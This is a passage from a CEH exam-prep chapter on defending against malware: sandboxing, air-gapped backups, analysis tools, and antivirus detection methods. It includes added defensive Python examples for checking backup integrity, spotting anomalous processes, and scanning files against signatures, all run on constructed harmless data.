When sheep ranchers purchase a new sheep, they first dip the sheep in a liquid designed to kill any parasites before introducing the sheep to the rest of the flock. In technology, a similar process can be accomplished with software. You can set up an isolated machine, or even a virtual machine, and install suspect software on it. Then you can run a range of process monitors to find out precisely what this software does before it is authorized for use on the network. This process, like the process sheep ranchers use, is called sheep dipping.

Sandboxing refers to putting something into an isolated environment in order to test it. Virtual machines are often used for this purpose. You can use a physical machine, but virtual machines are used more often for this purpose.

Backups

Ransomware often works by encrypting a user's files and demanding payment to allow the user access to the data. If you are attacked with ransomware and have a known good recent backup of the infected file, you can simply clean the machine and restore the known good backup and avoid paying the ransom. How do you know a backup is good? First, before backing up, you need to do a complete virus scan on the system you are backing up. Then, once the backup is complete, disconnect from the network. That way, a virus cannot move to your backup media. This is referred to as air gapping, as in there is nothing but air between your backup and the network—no wired or wireless connections, no Bluetooth, no connection of any kind.
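A virus scan and an air gap protect the backup media; they do not, by themselves, tell you whether what you restore is the data you meant to keep. The following is an added example, not code from the original chapter, of one concrete way to answer "how do you know a backup is good": it records a SHA-256 manifest when the backup is taken, verifies the files against it later, and flags changed or new files whose byte entropy looks like ciphertext, which is what crypto ransomware leaves behind. The demo() function creates a throwaway directory with constructed files and stages the attack itself; the 7.5 bits-per-byte threshold is my assumption.

```python
"""Integrity check for a backup set.  Added example, not from the original
chapter.  Records a SHA-256 manifest, verifies files against it later, and
flags changed or new files whose byte entropy is that of ciphertext.  demo()
builds a throwaway directory of constructed files and stages the attack."""
import hashlib
import json
import math
import os
import shutil
import tempfile
from collections import Counter


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def shannon_entropy(data):
    """Bits per byte: roughly 4 to 5 for text, close to 8 for encrypted or compressed data."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(n / total * math.log2(n / total) for n in Counter(data).values())


def build_manifest(root):
    """{relative path: sha256} for every file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            manifest[os.path.relpath(path, root)] = sha256_file(path)
    return manifest


def verify(root, manifest, entropy_threshold=7.5):
    """Compare root against a stored manifest.  Returns changed/missing/added
    paths plus the subset of changed+added files that look encrypted."""
    current = build_manifest(root)
    changed = sorted(p for p in manifest if p in current and current[p] != manifest[p])
    missing = sorted(p for p in manifest if p not in current)
    added = sorted(p for p in current if p not in manifest)
    looks_encrypted = []
    for rel in changed + added:
        with open(os.path.join(root, rel), "rb") as fh:
            sample = fh.read(1 << 20)                   # first MiB is enough for the heuristic
        if shannon_entropy(sample) > entropy_threshold:  # assumed threshold
            looks_encrypted.append(rel)
    return {"changed": changed, "missing": missing, "added": added,
            "looks_encrypted": looks_encrypted}


def demo():
    """Snapshot a small constructed backup, then simulate ransomware on one file."""
    root = tempfile.mkdtemp(prefix="backup-demo-")
    try:
        os.makedirs(os.path.join(root, "docs"))
        with open(os.path.join(root, "docs", "report.txt"), "w") as fh:
            fh.write("quarterly report, nothing unusual\n" * 200)
        with open(os.path.join(root, "docs", "notes.txt"), "w") as fh:
            fh.write("meeting notes\n" * 50)
        # The manifest would be written to offline (air-gapped) media at backup time.
        stored = json.dumps(build_manifest(root))
        # Crypto ransomware: the document is replaced by random bytes under a new name.
        victim = os.path.join(root, "docs", "report.txt")
        with open(victim + ".locked", "wb") as fh:
            fh.write(os.urandom(4096))
        os.remove(victim)
        return verify(root, json.loads(stored))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:15s} {paths}")
```

The manifest has to live somewhere the ransomware cannot reach, which is the same air-gapped media the text recommends for the backup itself; a manifest stored beside the data is just one more file to encrypt. The entropy heuristic also fires on legitimately compressed or encrypted archives, so treat it as a triage signal, not a verdict.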

Malware Analysis


Exam Alert

For the CEH exam, you need to have a basic understanding of malware analysis.


Even when you have a sheep dip computer, you need to have a process for analyzing software to determine if it is malware. There are primarily two types of analysis:

Static analysis: This analysis involves going through the executable binary code without actually executing it to get a better understanding of the malware and its purpose.

Dynamic analysis: This analysis involves actually executing the malware code so you can learn how it interacts with the host system and its impact on the system after it has been infected. Obviously, this should be done on an isolated machine.

BinText is a text extractor available from https://www.aldeid.com/wiki/BinText that can extract text from any kind of file. It allows you to find plain ASCII text, Unicode text, and resource strings, all of which provide useful information. You can see this tool in Figure 4.6.


Figure 4.6 BinText

IDA is another popular tool for malware reverse engineering. This tool, available at https://hex-rays.com/ida-pro/, comes in a free version and a pro version. It disassembles a binary and, with its decompiler, produces C-like pseudocode that approximates the original source, as shown in Figure 4.7. The true source code is not recoverable, and the pseudocode has to be read with that in mind.


Figure 4.7 IDA Decompiler

Obviously, being able to read and understand a tool's output is a skill you need to learn if you want to be a good ethical hacker. That level of detail is not on the CEH exam, but you may consider learning IDA and decompiling apart from your CEH study.

There are tools for both static and dynamic analysis. Static analysis tools include:

Portable Executable Scanner (pescan): https://tzworks.com/prototype_page.php?proto_id=15

Resource Hacker: http://www.angusj.com/resourcehacker/

PEView: https://www.aldeid.com

UPX: https://upx.github.io

Exeinfo PE: http://exeinfo.atwebpages.com

ASPack: http://www.aspack.com

Dependency-check: https://jeremylong.github.io

Snyk: https://snyk.io

Hakiri: https://hakiri.io

RetireJS: https://retirejs.github.io

WinDbg: http://www.windbg.org

objdump: https://sourceware.org

ProcDump: https://docs.microsoft.com

Dynamic analysis tools include:

CurrPorts: http://www.nirsoft.net

PortExpert: http://www.kcsoftwares.com

PRTG's Port sensor: https://kb.paessler.com

Nagios Port Monitor: https://exchange.nagios.org

Process Explorer: https://docs.microsoft.com

Registry Viewer: http://accessdata.com

RegScanner: http://www.nirsoft.net

Process Hacker: http://processhacker.sourceforge.net

For Windows malware, the Sysinternals tool suite is very popular in dynamic analysis. There are several tools in this suite that allow you to view processes, handles, memory allocation, and more. You can see the Sysinternals Process Explorer in Figure 4.8.

Figure 4.8 Sysinternals Process Explorer

Process information is helpful in understanding malware because malware often uses excessive resources, and sometimes it is named like a system file but does not start up in the proper order for that system file. You can get the Sysinternals tools for free and learn more about them at https://docs.microsoft.com/en-us/sysinternals/.
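The kind of check an analyst does by eye in Process Explorer, comparing a process's name against its parent and its image path, can be written down as a small baseline. The Python script below is an added example, not from the book or the Sysinternals suite: it runs a constructed process listing (the sort of data a Process Explorer or tasklist export contains) against a baseline of three core Windows processes and reports any copy that was started by the wrong parent, runs from the wrong directory, or appears more often than it should. The baseline entries (services.exe and lsass.exe started by wininit.exe, svchost.exe started by services.exe, all living in System32) describe normal Windows behavior; the process list itself is constructed.

```python
import ntpath
from typing import Dict, List, NamedTuple, Optional, Tuple


class Proc(NamedTuple):
    pid: int
    ppid: int
    name: str
    path: str


# Baseline for a few core Windows processes: which process should have started them
# and where the image should live. Deliberately small; extend it as needed.
SYSTEM32 = r"c:\windows\system32"
BASELINE = {
    "services.exe": {"parent": "wininit.exe",  "dir": SYSTEM32, "max_instances": 1},
    "lsass.exe":    {"parent": "wininit.exe",  "dir": SYSTEM32, "max_instances": 1},
    "svchost.exe":  {"parent": "services.exe", "dir": SYSTEM32, "max_instances": None},
}

# Constructed process listing for this example (pid, parent pid, name, image path).
SAMPLE_PROCS = [
    Proc(4, 0, "System", ""),
    Proc(500, 4, "wininit.exe", r"C:\Windows\System32\wininit.exe"),
    Proc(600, 500, "services.exe", r"C:\Windows\System32\services.exe"),
    Proc(640, 500, "lsass.exe", r"C:\Windows\System32\lsass.exe"),
    Proc(900, 600, "svchost.exe", r"C:\Windows\System32\svchost.exe"),
    Proc(1800, 2200, "explorer.exe", r"C:\Windows\explorer.exe"),
    # Two planted anomalies: a svchost.exe launched by explorer.exe from a temp
    # directory, and a second lsass.exe running from a user profile.
    Proc(3100, 1800, "svchost.exe", r"C:\Users\alice\AppData\Local\Temp\svchost.exe"),
    Proc(3200, 1800, "lsass.exe", r"C:\Users\alice\lsass.exe"),
]


def find_anomalies(procs: List[Proc]) -> List[Tuple[Optional[int], str]]:
    """Return (pid, finding) pairs; pid is None for findings about the whole listing."""
    by_pid: Dict[int, Proc] = {p.pid: p for p in procs}
    instances: Dict[str, int] = {}
    findings: List[Tuple[Optional[int], str]] = []
    for p in procs:
        name = p.name.lower()
        rule = BASELINE.get(name)
        if rule is None:
            continue
        instances[name] = instances.get(name, 0) + 1
        parent = by_pid.get(p.ppid)
        parent_name = parent.name.lower() if parent else "<exited or unknown>"
        if parent_name != rule["parent"]:
            findings.append((p.pid, f"{p.name} started by {parent_name}, expected {rule['parent']}"))
        # ntpath handles Windows separators even when this runs on Linux.
        if ntpath.dirname(p.path).lower() != rule["dir"]:
            findings.append((p.pid, f"{p.name} runs from {p.path!r}, expected {rule['dir']}"))
    for name, n in instances.items():
        limit = BASELINE[name]["max_instances"]
        if limit is not None and n > limit:
            findings.append((None, f"{n} copies of {name} running, expected at most {limit}"))
    return findings


if __name__ == "__main__":
    for pid, msg in find_anomalies(SAMPLE_PROCS):
        print(f"[pid {pid if pid is not None else '-'}] {msg}")
```

On a live system the listing would come from Process Explorer, tasklist, or WMI; the logic stays the same. A process that passes all three checks is not proven clean (the real svchost.exe can host a malicious service), but one that fails them is almost always worth a closer look.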

Antivirus


Exam Alert

Objective The CEH exam expects you to know the various ways to detect malware.


In general, there are five ways a malware scanner might scan for virus infections. Many, if not most, modern antimalware applications use multiple methods, and they are outlined and defined here:

Email and attachment scanning: Since a very common transmission method for a virus is email, email and attachment scanning is the most important function of any virus scanner. Some virus scanners actually examine your email on the email server before downloading it to your machine. Other virus scanners work by scanning your emails and attachments on your computer before passing them to your email program. And some even do both. The important point is that the email and its attachments should be scanned prior to the user having any chance to open them and release the virus on the system.

Download scanning: Any time a user downloads any file from the Internet, there is a chance of downloading an infected file. Download scanning works much like email and attachment scanning but operates on files you select for downloading. When you click on a link on a web page, the target file is scanned before it is downloaded.

File scanning: This is the type of scanning in which files on the system are checked to see whether they match any known virus. File scanning can be done on a scheduled basis, on demand, or both. It is a good idea to schedule your virus scanner to do a complete scan of the system periodically.

Heuristic scanning: This type of scanning uses rules to determine whether a file or program is behaving like a virus. It looks at behavior, rather than at a list of known viruses. A new virus will not be on a virus definition list, so antivirus software must examine behavior to determine whether something is a virus. However, this process is not foolproof. Some actual virus infections will be missed, and some nonvirus files might be suspected of being viruses.

Sandbox: Another approach is the sandbox approach. This basically means that you have a separate area, isolated from the operating system, in which a download or attachment is run. Then, if it is infected, it won’t infect the operating system.
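The file-scanning and heuristic methods above can be shown in a few dozen lines. The Python script below is an added example, not taken from the book or from any antivirus product: it scans a directory the way a file scanner does, hashing each file and comparing the digest against a known-bad set, searching the contents for byte-pattern signatures in a chunked read that also catches a pattern split across two chunks, and applying one simple heuristic (an executable disguised with a document extension such as `invoice.pdf.exe`). The "malware" samples, their hashes, the signature names, and the file names are all constructed for this example; nothing here is a real threat or a real definition.

```python
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple

# All samples below are constructed for this example; none is real malware.
BAD_PATTERN = b"CONSTRUCTED-DEMO-MALWARE-MARKER"
SAMPLE_BAD_A = b"MZ\x90\x00" + b"\x00" * 32 + BAD_PATTERN + b"\x00" * 32   # caught by pattern
SAMPLE_BAD_B = b"MZ\x90\x00" + bytes(range(64)) * 4                        # caught by hash only
SAMPLE_CLEAN = b"%PDF-1.7\n%constructed clean document\n"

# "Definitions" a scanner would load: exact-file hashes and byte-pattern signatures.
KNOWN_BAD_HASHES: Dict[str, str] = {hashlib.sha256(SAMPLE_BAD_B).hexdigest(): "Demo.HashOnly"}
PATTERN_SIGNATURES: Dict[bytes, str] = {BAD_PATTERN: "Demo.PatternSig"}
EXEC_EXT = {"exe", "scr", "com", "pif"}
DOC_EXT = {"pdf", "doc", "docx", "jpg", "txt"}
CHUNK = 64 * 1024


def scan_file(path: str) -> List[Tuple[str, str]]:
    """Return (engine, detection) pairs from the 'signature', 'hash' and 'heuristic' checks."""
    hits: List[Tuple[str, str]] = []
    seen = set()
    digest = hashlib.sha256()
    overlap = max(len(sig) for sig in PATTERN_SIGNATURES) - 1
    tail = b""
    with open(path, "rb") as fh:
        while True:
            chunk = fh.read(CHUNK)
            if not chunk:
                break
            digest.update(chunk)
            # Carry the end of the previous chunk so a pattern split across chunks is still found.
            window = tail + chunk
            for sig, name in PATTERN_SIGNATURES.items():
                if name not in seen and sig in window:
                    seen.add(name)
                    hits.append(("signature", name))
            tail = window[-overlap:] if overlap > 0 else b""
    hexdigest = digest.hexdigest()
    if hexdigest in KNOWN_BAD_HASHES:
        hits.append(("hash", KNOWN_BAD_HASHES[hexdigest]))
    # Heuristic: "report.pdf.exe" is an executable pretending to be a document.
    parts = os.path.basename(path).lower().split(".")
    if len(parts) >= 3 and parts[-1] in EXEC_EXT and parts[-2] in DOC_EXT:
        hits.append(("heuristic", "Suspicious.DoubleExtension"))
    return hits


def scan_directory(root: str) -> Dict[str, List[Tuple[str, str]]]:
    """Scan every regular file under root; the result maps relative path to its detections."""
    results: Dict[str, List[Tuple[str, str]]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            full = os.path.join(dirpath, fname)
            results[os.path.relpath(full, root)] = scan_file(full)
    return results


def demo_scan() -> Dict[str, List[Tuple[str, str]]]:
    """Write the constructed samples to a temporary directory, scan it, and return the results."""
    files = {
        "update.exe": SAMPLE_BAD_A,
        "setup.exe": SAMPLE_BAD_B,
        "invoice.pdf.exe": SAMPLE_CLEAN,
        "report.pdf": SAMPLE_CLEAN,
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in files.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(body)
        return scan_directory(tmp)


if __name__ == "__main__":
    for rel, hits in demo_scan().items():
        print(f"{rel:<18} {'clean' if not hits else ', '.join(f'{e}:{d}' for e, d in hits)}")
```

The three engines fail in different ways, which is why real products stack them: a hash match is exact but misses any file that differs by one byte, a byte pattern survives small changes but can be defeated by packing (see the entropy check under static analysis), and the heuristic flags behavior or appearance rather than content, so it catches new files at the cost of some false positives, exactly the trade-off the heuristic-scanning bullet above describes.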

It should be noted that many anti-malware systems advertise that they incorporate some level of machine learning in their malware detection. However, at this point, the most the CEH exam might ask you is whether there is such a thing as machine learning antimalware. You won’t need to know details. If you wish to learn more, see the following resources:

Machine Learning for Malware Detection: https://media.kaspersky.com/en/enterprise-security/Kaspersky-Lab-Whitepaper-Machine-Learning.pdf

Machine Learning & Artificial Intelligence: https://www.mcafee.com/enterprise/en-us/solutions/machine-learning.html

What Next?

If you want more practice on this chapter's exam objectives before you move on, remember that you can access all of the Cram Quiz questions on the book web page. The next chapter covers packet sniffing and social engineering.
